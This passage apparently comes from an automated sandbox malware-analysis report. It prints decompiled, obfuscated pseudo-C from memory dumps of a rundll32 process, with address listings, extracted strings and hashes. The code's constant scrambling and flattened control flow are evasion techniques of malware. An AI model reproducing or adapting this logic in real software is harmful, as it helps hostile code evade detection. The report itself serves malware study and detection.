				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) | 0x66c43148;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xbef6;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0x66c4e3a8;
				 *(_t466 + 0xa8) = 0xb108;
				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) + 0xffffb23b;
				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) ^ 0x00003984;
				 *(_t466 + 0x60) = 0x972c;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) | 0x55a95463;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) << 3;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) ^ 0xad4eaf49;
				 *(_t466 + 0x38) = 0xedfb;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) / _t414;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) + 0xffffecb7;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) << 0xe;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) ^ 0xfbce5bfc;
				 *(_t466 + 0x44) = 0x5f66;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) << 8;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) * 0x4b;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) ^ 0x1bf2eb8b;
				 *(_t466 + 0x74) = 0xc9a;
				 *(_t466 + 0x74) =  *(_t466 + 0x74) + 0x2510;
				 *(_t466 + 0x74) =  *(_t466 + 0x74) ^ 0x00001e79;
				 *(_t466 + 0x58) = 0xe86a;
				_t415 = 0x5c;
				 *(_t466 + 0x5c) =  *(_t466 + 0x58) / _t415;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xffff7371;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0xffff2425;
				 *(_t466 + 0x84) = 0xcc82;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) + 0xc6d3;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x0001c52d;
				 *(_t466 + 0xb0) = 0x36af;
				_t408 = 0x79;
				 *(_t466 + 0xac) =  *(_t466 + 0xb0) / _t408;
				 *(_t466 + 0xac) =  *(_t466 + 0xac) ^ 0x00000e87;
				 *(_t466 + 0x4c) = 0x72c3;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xfe00;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xffffcf74;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) ^ 0x00017982;
				 *(_t466 + 0x88) = 0xe5b8;
				 *(_t466 + 0x88) =  *(_t466 + 0x88) + 0xffff64c8;
				 *(_t466 + 0x88) =  *(_t466 + 0x88) ^ 0x00004835;
				 *(_t466 + 0x3c) = 0xe83b;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x50645aeb;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) << 4;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) >> 0xe;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x000050c9;
				 *(_t466 + 0x34) = 0x9196;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 9;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 5;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) << 5;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) ^ 0x00007a23;
				 *(_t466 + 0x24) = 0x47d0;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x92809c60;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x0aa14077;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) >> 9;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x004c1604;
				 *(_t466 + 0x54) = 0xa739;
				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b351c6;
				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b3adaf;
				 *(_t466 + 0x6c) = 0x41b6;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) + 0x2b93;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) >> 6;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) ^ 0x000038f9;
				 *(_t466 + 0x94) = 0xf0c0;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) * 0x45;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x0040ff8e;
				 *(_t466 + 0x8c) = 0x53d0;
				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) | 0x714ab1e7;
				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) ^ 0x714af8de;
				 *(_t466 + 0x28) = 0xe7ca;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) | 0x74901d91;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) >> 2;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) << 2;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) ^ 0x7490bdaa;
				 *(_t466 + 0x84) = 0x4172;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) * 0x69;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x001ac2d4;
				 *(_t466 + 0x78) = 0xc4a2;
				 *(_t466 + 0x78) =  *(_t466 + 0x78) | 0xb1071ce6;
				 *(_t466 + 0x78) =  *(_t466 + 0x78) ^ 0xb107e3cc;
				 *(_t466 + 0x98) = 0xafb5;
				 *(_t466 + 0x98) =  *(_t466 + 0x98) >> 5;
				 *(_t466 + 0x98) =  *(_t466 + 0x98) ^ 0x000050c6;
				 *(_t466 + 0x48) = 0x5e6d;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) + 0xffff30ef;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) << 6;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) ^ 0xffe3f79c;
				 *(_t466 + 0xa4) = 0xfcdb;
				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) << 0xd;
				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) ^ 0x1f9b008b;
				 *(_t466 + 0x1c) = 0x2d62;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) >> 7;
				_t416 = 0x36;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) / _t416;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) + 0xffff17c7;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) ^ 0xffff0d36;
				 *(_t466 + 0xa0) = 0xd9f3;
				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) + 0x7ef3;
				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) ^ 0x00014615;
				 *(_t466 + 0x2c) = 0x45e6;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) | 0xb2517b85;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) + 0xffff8485;
				_t417 = 0x47;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) / _t417;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) ^ 0x028281f3;
				 *(_t466 + 0x14) = 0x40cf;
				_t418 = 0x54;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) / _t418;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) >> 0xf;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffcfbb;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0xffffd245;
				 *(_t466 + 0x70) = 0xec9;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) | 0x66abf62f;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) >> 2;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) ^ 0x19aa8e93;
				 *(_t466 + 0x9c) = 0xb92f;
				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) << 0xa;
				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) ^ 0x02e4dd06;
				 *(_t466 + 0x40) = 0xf9b7;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0xd32ba56e;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) + 0xffff6d4c;
				_t409 =  *(_t466 + 0xb0);
				 *(_t466 + 0x40) =  *(_t466 + 0x40) / _t408;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0x01bea26b;
				 *(_t466 + 0x68) = 0x7664;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) >> 0xc;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) + 0xffff8a59;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xffff9898;
				do {
					while(_t460 != 0x4166320) {
						if(_t460 == 0x5d953cf) {
							E00208668( *(_t466 + 0x68),  *(_t466 + 0x40), __eflags,  *(_t466 + 0x48), _t466 + 0x2c8);
							_t460 = 0x2c6b1ef9;
							continue;
						} else {
							if(_t460 == 0xe980b9f) {
								_t460 = 0x273bc967;
								continue;
							} else {
								if(_t460 == 0x1c525ebd) {
									_t409 = E001F492A( *(_t466 + 0x60), 0,  *((intOrPtr*)(_t466 + 0xc0)),  *((intOrPtr*)(_t466 + 0xb4)),  *(_t466 + 0x4c),  *(_t466 + 0x60),  *(_t466 + 0x6c),  *(_t466 + 0x9c),  *(_t466 + 0x60),  *((intOrPtr*)(_t466 + 0x4e8)),  *(_t466 + 0x88),  *((intOrPtr*)(_t466 + 0x80)),  *(_t466 + 0x9c),  *(_t466 + 0x48));
									_t466 = _t466 + 0x30;
									__eflags = _t395 - 0xffffffff;
									if(__eflags != 0) {
										_t460 = 0x35123284;
										continue;
									}
								} else {
									if(_t460 == 0x273bc967) {
										E001F8C0C( *(_t466 + 0x70), __eflags,  *(_t466 + 0x18),  *(_t466 + 0x94), _t466 + 0xc0);
										_t400 = E001F1E13( *(_t466 + 0x38),  *(_t466 + 0x30),  *(_t466 + 0x70),  *((intOrPtr*)(_t466 + 0xb8)), _t466 + 0xcc);
										_t466 = _t466 + 0x18;
										_t460 = 0x5d953cf;
										 *_t400 = 0;
										continue;
									} else {
										if(_t460 == 0x2c6b1ef9) {
											_push( *((intOrPtr*)(_t466 + 0x4d4)));
											_push( *(_t466 + 0x84));
											E002064EC( *((intOrPtr*)(_t466 + 0xbc)), __eflags, E0020BF25( *(_t466 + 0x7c),  *(_t466 + 0x60), __eflags),  *((intOrPtr*)(_t466 + 0xcc)), 0x104, _t466 + 0x2e0, _t466 + 0xd0,  *(_t466 + 0x5c),  *(_t466 + 0x94),  *(_t466 + 0x44));
											E0020C5F7( *(_t466 + 0x68),  *(_t466 + 0x58),  *(_t466 + 0x84),  *(_t466 + 0x98), _t401);
											_t466 = _t466 + 0x34;
											_t460 = 0x1c525ebd;
											continue;
										} else {
											if(_t460 != 0x35123284) {
												goto L16;
											} else {
												E001F1F8B( *((intOrPtr*)(_t464 + 4)),  *((intOrPtr*)(_t466 + 0xc4)),  *(_t466 + 0x38),  *((intOrPtr*)(_t466 + 0xb8)), _t464 + 4,  *(_t466 + 0x3c),  *((intOrPtr*)(_t466 + 0x20)), _t409, _t464 + 4,  *_t464);
												_t466 = _t466 + 0x20;
												_t460 = 0x4166320;
												_t457 =  !=  ? 1 : _t457;
												continue;
											}
										}
									}
								}
							}
						}
						goto L17;
					}
					E001F78F0(_t409,  *(_t466 + 0x7c),  *(_t466 + 0xa4),  *(_t466 + 0x44),  *(_t466 + 0x68));
					_t466 = _t466 + 0xc;
					_t460 = 0x2a923978;
					L16:
					__eflags = _t460 - 0x2a923978;
				} while (__eflags != 0);
				L17:
				return _t457;
			}

0x001f262e
0x001f2639
0x001f2648
0x001f264a
0x001f2651
0x001f2658
0x001f265a
0x001f2664
0x001f2669
0x001f266e
0x001f2676
0x001f267e
0x001f2686
0x001f268e
0x001f2696
0x001f269e
0x001f26a6
0x001f26ae
0x001f26b3
0x001f26bb
0x001f26c9
0x001f26ce
0x001f26d4
0x001f26dc
0x001f26e4
0x001f26f1
0x001f26f4
0x001f26f8
0x001f2700
0x001f2708
0x001f2710
0x001f271b
0x001f2723
0x001f272e
0x001f2736
0x001f2746
0x001f274a
0x001f2752
0x001f275a
0x001f2762
0x001f276f
0x001f2770
0x001f2774
0x001f2779
0x001f2781
0x001f2789
0x001f2791
0x001f2799
0x001f27a1
0x001f27ac
0x001f27b7
0x001f27c2
0x001f27ca
0x001f27d2
0x001f27d7
0x001f27df
0x001f27ed
0x001f27f1
0x001f27f9
0x001f27fe
0x001f2806
0x001f280e
0x001f2818
0x001f281e
0x001f2826
0x001f282e
0x001f2836
0x001f283e
0x001f284c
0x001f2851
0x001f2857
0x001f285f
0x001f2867
0x001f2872
0x001f287d
0x001f2888
0x001f289a
0x001f289d
0x001f28a4
0x001f28af
0x001f28b7
0x001f28bf
0x001f28c7
0x001f28cf
0x001f28da
0x001f28e5
0x001f28f0
0x001f28f8
0x001f2900
0x001f2905
0x001f290a
0x001f2912
0x001f291a
0x001f291f
0x001f2924
0x001f2929
0x001f2931
0x001f2939
0x001f2941
0x001f2949
0x001f294e
0x001f2956
0x001f2966
0x001f296e
0x001f2976
0x001f297e
0x001f2986
0x001f298b
0x001f2993
0x001f29a6
0x001f29ad
0x001f29b8
0x001f29c3
0x001f29ce
0x001f29d9
0x001f29e1
0x001f29e9
0x001f29ee
0x001f29f3
0x001f29fb
0x001f2a0e
0x001f2a15
0x001f2a20
0x001f2a28
0x001f2a30
0x001f2a38
0x001f2a43
0x001f2a4b
0x001f2a56
0x001f2a5e
0x001f2a66
0x001f2a6b
0x001f2a75
0x001f2a80
0x001f2a88
0x001f2a93
0x001f2a9b
0x001f2aa6
0x001f2aab
0x001f2aaf
0x001f2ab7
0x001f2abf
0x001f2aca
0x001f2ad5
0x001f2ae0
0x001f2ae8
0x001f2af0
0x001f2afe
0x001f2b03
0x001f2b07
0x001f2b0f
0x001f2b1d
0x001f2b22
0x001f2b26
0x001f2b2b
0x001f2b33
0x001f2b3b
0x001f2b43
0x001f2b4b
0x001f2b50
0x001f2b58
0x001f2b63
0x001f2b6b
0x001f2b76
0x001f2b7e
0x001f2b86
0x001f2b94
0x001f2b9b
0x001f2b9f
0x001f2ba7
0x001f2baf
0x001f2bb4
0x001f2bbc
0x001f2bc4
0x001f2bc4
0x001f2bd6
0x001f2da2
0x001f2da9
0x00000000
0x001f2bdc
0x001f2be2
0x001f2d84
0x00000000
0x001f2be8
0x001f2bee
0x001f2d70
0x001f2d72
0x001f2d75
0x001f2d78
0x001f2d7a
0x00000000
0x001f2d7a
0x001f2bf4
0x001f2bfa
0x001f2cef
0x001f2d0f
0x001f2d14
0x001f2d17
0x001f2d1e
0x00000000
0x001f2c00
0x001f2c06
0x001f2c53
0x001f2c5a
0x001f2caa
0x001f2cc6
0x001f2ccb
0x001f2cce
0x00000000
0x001f2c08
0x001f2c0e
0x00000000
0x001f2c14
0x001f2c39
0x001f2c40
0x001f2c44
0x001f2c4b
0x00000000
0x001f2c4b
0x001f2c0e
0x001f2c06
0x001f2bfa
0x001f2bee
0x001f2be2
0x00000000
0x001f2bd6
0x001f2dc8
0x001f2dcd
0x001f2dd0
0x001f2dd5
0x001f2dd5
0x001f2dd5
0x001f2de1
0x001f2ded

Strings

m^, xrefs: 001F2A56
dv, xrefs: 001F2BA7
l7, xrefs: 001F265A
b-, xrefs: 001F2A93
ZdP, xrefs: 001F28F8
#z, xrefs: 001F2929
(9, xrefs: 001F274A
j, xrefs: 001F283E
5H, xrefs: 001F28E5
rA, xrefs: 001F29FB
E, xrefs: 001F2AE0
z), xrefs: 001F2781
f_, xrefs: 001F2806

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #z$(9$5H$b-$dv$f_$j$l7$m^$rA$z)$E$ZdP
API String ID: 0-500794611
Opcode ID: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
Instruction ID: d74cad3276fb57d0e01709fbe25541bf6fc4829c3f3f377abecb31f24ccd9c88
Opcode Fuzzy Hash: 6c22406395d75c115b4026df920d1e405d61ac760d96bcec021409155602d6bf
Instruction Fuzzy Hash: 880230715093819FE368CF21C98AA5BFBF1BBC4708F10891DE2D9962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00291B9C, Relevance: 16.6, Strings: 13, Instructions: 349COMMON

Download Yara Rule

Strings

E, xrefs: 00292054
#z, xrefs: 00291E9D
m^, xrefs: 00291FCA
j, xrefs: 00291DB2
ZdP, xrefs: 00291E6C
f_, xrefs: 00291D7A
5H, xrefs: 00291E59
l7, xrefs: 00291BCE
(9, xrefs: 00291CBE
z), xrefs: 00291CF5
rA, xrefs: 00291F6F
b-, xrefs: 00292007
dv, xrefs: 0029211B

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #z$(9$5H$b-$dv$f_$j$l7$m^$rA$z)$E$ZdP
API String ID: 0-500794611
Opcode ID: a18a6308c97344c8daefeed80e8b0fd318673096963e378d00059e38dca4993a
Instruction ID: c60dfd61c4540ed02b02867c4d13f601d35a2105e58ead5cb88e145d898ce96d
Opcode Fuzzy Hash: a18a6308c97344c8daefeed80e8b0fd318673096963e378d00059e38dca4993a
Instruction Fuzzy Hash: FE023F71509381DFE768CF25C98AA4BFBE1BBC5708F10891DE2D9962A0C7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001F9CC8, Relevance: 16.5, Strings: 13, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001F9CC8() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				intOrPtr _t232;
				void* _t233;
				intOrPtr _t236;
				void* _t246;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				intOrPtr _t277;
				signed int* _t279;
				void* _t282;

				_t279 =  &_v612;
				_v532 = 0x572357;
				_v528 = 0x2f5978;
				_t270 = 0xf;
				_t277 = 0;
				_v524 = 0;
				_t246 = 0x31c11544;
				_v612 = 0x129f;
				_v612 = _v612 / _t270;
				_v612 = _v612 ^ 0xf442200a;
				_v612 = _v612 + 0x8904;
				_v612 = _v612 ^ 0xf442aa27;
				_v608 = 0x5b59;
				_t271 = 7;
				_v608 = _v608 / _t271;
				_v608 = _v608 ^ 0x00000d25;
				_v596 = 0x2567;
				_v596 = _v596 ^ 0xfa26aa3d;
				_v596 = _v596 << 0x10;
				_t272 = 0x51;
				_v596 = _v596 / _t272;
				_v596 = _v596 ^ 0x01c566ae;
				_v564 = 0x2177;
				_v564 = _v564 ^ 0x4051fc1c;
				_v564 = _v564 ^ 0xb5034854;
				_v564 = _v564 ^ 0xf552b9fc;
				_v552 = 0xa42c;
				_v552 = _v552 + 0xffff8520;
				_t273 = 0x36;
				_v552 = _v552 / _t273;
				_v552 = _v552 ^ 0x00005687;
				_v556 = 0x4d63;
				_v556 = _v556 ^ 0x23f659e6;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x3f617f89;
				_v548 = 0xc92c;
				_t274 = 0x1f;
				_v548 = _v548 / _t274;
				_v548 = _v548 | 0xd485f233;
				_v548 = _v548 ^ 0xd4858bcc;
				_v608 = 0x4780;
				_v608 = _v608 + 0xffff036b;
				_v608 = _v608 ^ 0xffff7b62;
				_v592 = 0xf0a1;
				_v592 = _v592 ^ 0x3b3a717c;
				_v592 = _v592 ^ 0x4319cb35;
				_v592 = _v592 + 0x4f8d;
				_v592 = _v592 ^ 0x78239a46;
				_v588 = 0x33cb;
				_v588 = _v588 * 0x50;
				_v588 = _v588 | 0x5a8f737f;
				_v588 = _v588 ^ 0x5a9f48d0;
				_v536 = 0x13fd;
				_v536 = _v536 * 5;
				_v536 = _v536 ^ 0x00004fad;
				_v600 = 0x5083;
				_v600 = _v600 ^ 0xb24ff3ec;
				_v600 = _v600 + 0xffff65b9;
				_t275 = 0x35;
				_v600 = _v600 * 0x36;
				_v600 = _v600 ^ 0x9cabf209;
				_v572 = 0x63e6;
				_v572 = _v572 << 3;
				_v572 = _v572 + 0x6ca3;
				_v572 = _v572 ^ 0x0003addb;
				_v540 = 0x1289;
				_v540 = _v540 >> 1;
				_v540 = _v540 ^ 0x00003929;
				_v544 = 0x5834;
				_v544 = _v544 ^ 0x9eb824c8;
				_v544 = _v544 ^ 0x9eb8689b;
				_v584 = 0x7c37;
				_v584 = _v584 * 0x74;
				_v584 = _v584 ^ 0x66bbdc02;
				_v584 = _v584 ^ 0x6683aa43;
				_v568 = 0x4cc0;
				_v568 = _v568 | 0x439ba37f;
				_v568 = _v568 + 0xffffbc9e;
				_v568 = _v568 ^ 0x439bbd6b;
				_v560 = 0x409b;
				_v560 = _v560 + 0x5a42;
				_v560 = _v560 + 0xabe3;
				_v560 = _v560 ^ 0x000101e3;
				_v612 = 0x62bf;
				_v612 = _v612 << 9;
				_v612 = _v612 + 0xffffd5ba;
				_v612 = _v612 ^ 0xe652b9b2;
				_v612 = _v612 ^ 0xe697c132;
				_v576 = 0x7077;
				_t276 = _v608;
				_v576 = _v576 / _t275;
				_v576 = _v576 * 5;
				_v576 = _v576 ^ 0x00006027;
				_v580 = 0x9a4a;
				_v580 = _v580 + 0x4b3e;
				_v580 = _v580 << 0xe;
				_v580 = _v580 ^ 0x396d003f;
				goto L1;
				do {
					while(1) {
						L1:
						_t282 = _t246 - 0x31c11544;
						if(_t282 > 0) {
							break;
						}
						if(_t282 == 0) {
							_push(_t246);
							_t236 = E002057E8(0x440);
							 *0x2121b0 = _t236;
							__eflags = _t236;
							if(__eflags == 0) {
								L23:
								return _t277;
							}
							 *((intOrPtr*)(_t236 + 0x21c)) = E001F94EC;
							_t246 = 0x30823c81;
							continue;
						}
						if(_t246 == 0x687b4fe) {
							_v604 = 0xf298;
							_t246 = 0x37d3e938;
							_v604 = _v604 + 0xbb6f;
							_v604 = _v604 ^ 0x0001ae2e;
							continue;
						}
						if(_t246 == 0x8847984) {
							E001F8C0C(_v584, __eflags, _v568, _v560,  &_v520);
							 *((intOrPtr*)( *0x2121b0 + 0xc)) = E0020C424( &_v520, _v576);
							goto L23;
						}
						if(_t246 == 0x2aee8ed5) {
							_v604 = 0xdb1c;
							_t246 = 0x3b385d06;
							_v604 = _v604 | 0xf22f27d0;
							_v604 = _v604 ^ 0xf22fffc0;
							 *((intOrPtr*)( *0x2121b0 + 0x220)) = E00207A42;
							continue;
						}
						if(_t246 != 0x30823c81) {
							goto L20;
						}
						_t276 = E001FDA66(_v580, _t267, _v552, _t246, _v556);
						_t279 =  &(_t279[3]);
						if(_t276 == 0) {
							_t246 = 0x2aee8ed5;
						} else {
							 *((intOrPtr*)( *0x2121b0 + 0x22c)) = 1;
							_t246 = 0x687b4fe;
						}
					}
					__eflags = _t246 - 0x37d3e938;
					if(_t246 == 0x37d3e938) {
						_t267 = _t276;
						E0020F23C(_v548, _t276, _v608, _v592, _v588);
						_t279 =  &(_t279[3]);
						_t246 = 0x3b385d06;
						goto L20;
					}
					__eflags = _t246 - 0x3b385d06;
					if(_t246 == 0x3b385d06) {
						_push(_t246);
						_t198 =  &_v600; // 0x6027
						_t267 = _v536;
						_t232 = E001F1D54(_v536, _t246,  *_t198, _v572, _v540,  *0x2121b0 + 0x234, _v544, _v604);
						_t279 =  &(_t279[8]);
						_t246 = 0x3b59d612;
						__eflags = _t232;
						_t233 = 1;
						_t277 =  ==  ? _t233 : _t277;
						goto L1;
					}
					__eflags = _t246 - 0x3b59d612;
					if(_t246 != 0x3b59d612) {
						goto L20;
					}
					E001F7605();
					_t246 = 0x8847984;
					goto L1;
					L20:
					__eflags = _t246 - 0x393fa17b;
				} while (__eflags != 0);
				goto L23;
			}

0x001f9cc8
0x001f9cce
0x001f9cd8
0x001f9ce6
0x001f9ce7
0x001f9cee
0x001f9cf2
0x001f9cf4
0x001f9d04
0x001f9d0a
0x001f9d12
0x001f9d1a
0x001f9d22
0x001f9d2e
0x001f9d33
0x001f9d39
0x001f9d41
0x001f9d49
0x001f9d51
0x001f9d5a
0x001f9d5f
0x001f9d65
0x001f9d6d
0x001f9d75
0x001f9d7d
0x001f9d85
0x001f9d8d
0x001f9d95
0x001f9da1
0x001f9da6
0x001f9dac
0x001f9db4
0x001f9dbc
0x001f9dc4
0x001f9dc9
0x001f9dd1
0x001f9ddd
0x001f9de0
0x001f9de4
0x001f9dec
0x001f9df4
0x001f9dfc
0x001f9e04
0x001f9e0c
0x001f9e14
0x001f9e1c
0x001f9e24
0x001f9e2c
0x001f9e34
0x001f9e41
0x001f9e45
0x001f9e4d
0x001f9e55
0x001f9e62
0x001f9e66
0x001f9e6e
0x001f9e78
0x001f9e85
0x001f9e94
0x001f9e95
0x001f9e99
0x001f9ea1
0x001f9ea9
0x001f9eae
0x001f9eb6
0x001f9ebe
0x001f9ec6
0x001f9eca
0x001f9ed2
0x001f9eda
0x001f9ee2
0x001f9eea
0x001f9ef7
0x001f9efb
0x001f9f03
0x001f9f0b
0x001f9f13
0x001f9f1b
0x001f9f23
0x001f9f2b
0x001f9f33
0x001f9f3b
0x001f9f43
0x001f9f4b
0x001f9f53
0x001f9f58
0x001f9f60
0x001f9f68
0x001f9f70
0x001f9f7e
0x001f9f82
0x001f9f8b
0x001f9f8f
0x001f9f97
0x001f9f9f
0x001f9fa7
0x001f9fac
0x001f9fac
0x001f9fb4
0x001f9fb4
0x001f9fb4
0x001f9fb4
0x001f9fb6
0x00000000
0x00000000
0x001f9fbc
0x001fa07d
0x001fa083
0x001fa088
0x001fa08e
0x001fa090
0x001fa16a
0x001fa175
0x001fa175
0x001fa096
0x001fa0a0
0x00000000
0x001fa0a0
0x001f9fc8
0x001fa053
0x001fa05b
0x001fa060
0x001fa068
0x00000000
0x001fa068
0x001f9fd4
0x001fa147
0x001fa166
0x00000000
0x001fa166
0x001f9fe0
0x001fa025
0x001fa02d
0x001fa02f
0x001fa037
0x001fa044
0x00000000
0x001fa044
0x001f9fe8
0x00000000
0x00000000
0x001fa000
0x001fa002
0x001fa007
0x001fa01e
0x001fa009
0x001fa011
0x001fa017
0x001fa017
0x001fa007
0x001fa0aa
0x001fa0b0
0x001fa110
0x001fa11e
0x001fa123
0x001fa126
0x00000000
0x001fa126
0x001fa0b2
0x001fa0b4
0x001fa0cd
0x001fa0e9
0x001fa0ed
0x001fa0f2
0x001fa0f7
0x001fa0fa
0x001fa0ff
0x001fa103
0x001fa104
0x00000000
0x001fa104
0x001fa0b6
0x001fa0bc
0x00000000
0x00000000
0x001fa0be
0x001fa0c3
0x00000000
0x001fa128
0x001fa128
0x001fa128
0x00000000

Strings

cM, xrefs: 001F9DB4
4X, xrefs: 001F9ED2
%, xrefs: 001F9D39
BZ, xrefs: 001F9F33
'`?, xrefs: 001FA0E9
W#W, xrefs: 001F9CCE
7|, xrefs: 001F9EEA
c, xrefs: 001F9EA1
?, xrefs: 001F9FAC
xY/, xrefs: 001F9CD8
|q:;, xrefs: 001F9E14
>K, xrefs: 001F9F9F
)9, xrefs: 001F9ECA

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %$'`?$)9$4X$7|$>K$?$BZ$W#W$cM$xY/$|q:;$c
API String ID: 0-1474617872
Opcode ID: 307d8fa1f23cf5315ee491fe7392b0b35f406cc13d80bae6d68d539b3fdb4a93
Instruction ID: bd65fb373e896f3abe98ebbb38f3a9a02e7ee2598c5cd65a52b84de1a06048a2
Opcode Fuzzy Hash: 307d8fa1f23cf5315ee491fe7392b0b35f406cc13d80bae6d68d539b3fdb4a93
Instruction Fuzzy Hash: D1B130B11093819FE358CF65D58942BFBF1ABD4748F10891DF296862A0C7B98A09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0029923C, Relevance: 16.5, Strings: 13, Instructions: 243COMMON

Download Yara Rule

Strings

%, xrefs: 002992AD
?, xrefs: 00299520
xY/, xrefs: 0029924C
7|, xrefs: 0029945E
W#W, xrefs: 00299242
4X, xrefs: 00299446
cM, xrefs: 00299328
BZ, xrefs: 002994A7
)9, xrefs: 0029943E
c, xrefs: 00299415
|q:;, xrefs: 00299388
>K, xrefs: 00299513
'`?, xrefs: 0029965D

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %$'`?$)9$4X$7|$>K$?$BZ$W#W$cM$xY/$|q:;$c
API String ID: 0-1474617872
